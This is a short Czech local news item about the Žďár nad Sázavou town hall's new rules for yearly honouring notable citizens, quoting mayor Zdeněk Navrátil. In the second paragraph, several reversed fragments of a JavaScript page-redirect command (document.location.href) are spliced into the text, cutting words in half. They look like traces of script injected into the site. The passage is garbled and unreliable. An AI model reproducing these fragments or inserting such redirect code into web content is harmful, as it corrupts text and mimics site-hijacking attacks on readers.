Rainbow page separator

Ve Žďáře začnou oceňovat významné osobnosti

Pátek, 1. ledna 2016

Náměstí Republiky Žďár nad Sázavou

Žďár nad Sázavou / Pravidla pro oceňování významných osobností města připravila žďárská radnice. „Chtěli bychom každý rok oceňovat lidi za zásluhy v oblasti kultury, sportu, vzdělávání či veřejného života, ale také za mimořádné činy morálního charakteru, jako je záchrana lidského života, zdraví či majetku. Může se tedy stát, že v jednom roce budou oceněny dvě osobnosti,“ vyjádřil se starosta Žďáru nad Sázavou Zdeněk Navrátil.
První ocenění v podobě pamětního listu a speciální medaile by mělo být uděleno s největší pravděpodobností u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti druhého ročníku akce žďárské radnice Den Žďáru, která se uskuteční 11. června. „Obyvatelé města mohou posílat svoje návrhy na lidi, kteří by si ocenění zasloužili, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude zpětně uděleno za rok 2015,“ doplnil starosta.